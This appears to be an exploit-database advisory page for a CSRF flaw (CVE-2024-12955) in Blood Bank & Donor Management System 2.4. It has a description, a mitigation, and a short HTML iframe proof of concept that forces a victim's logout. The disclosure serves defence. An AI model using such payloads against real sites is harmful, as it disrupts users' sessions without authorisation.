header-logo
Suggest Exploit
vendor:
Blood Bank & Donor Management System
by:
Kwangyun Keum
4.1
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Blood Bank & Donor Management System
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: NO
Related CWE: CVE-2024-12955
CPE: a:phpgurukul:blood_bank_donor_management_system:2.4
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Kali Linux with Apache and MySQL
2024

Blood Bank & Donor Management System 2.4 – CSRF Improper Input Validation

Blood Bank & Donor Management System version 2.4 is vulnerable to CSRF attacks due to the lack of CSRF tokens for essential functions like logout. By creating a malicious iframe with the logout URL, an attacker can deceive a user into clicking it, resulting in the user being logged out without their knowledge.

Mitigation:

To mitigate this vulnerability, implement proper CSRF tokens for all critical actions like logout to validate the requests coming from authenticated users.
Source

Exploit-DB raw data:

#Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper
Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955

## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
functionalities such as logout. An attacker can craft a malicious iframe
embedding the logout URL and trick a victim into clicking it. This results
in the victim being logged out without their consent.

## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:

   ```html
   <html>
     <body>
       <iframe
         src="http://localhost/bbdms/logout.php"
         style="border:0px #FFFFFF none;"
         name="myLogoutFrame"
         scrolling="no"
         frameborder="1"
         marginheight="0px"
         marginwidth="0px"
         height="400px"
         width="600px"
         allowfullscreen>
       </iframe>
     </body>
   </html>
4. Save the above HTML code as logout_poc.html.
5.Open the file in a browser and click anywhere on the page to trigger the
logout.

Navigation

Suggest Exploit

Services By CQR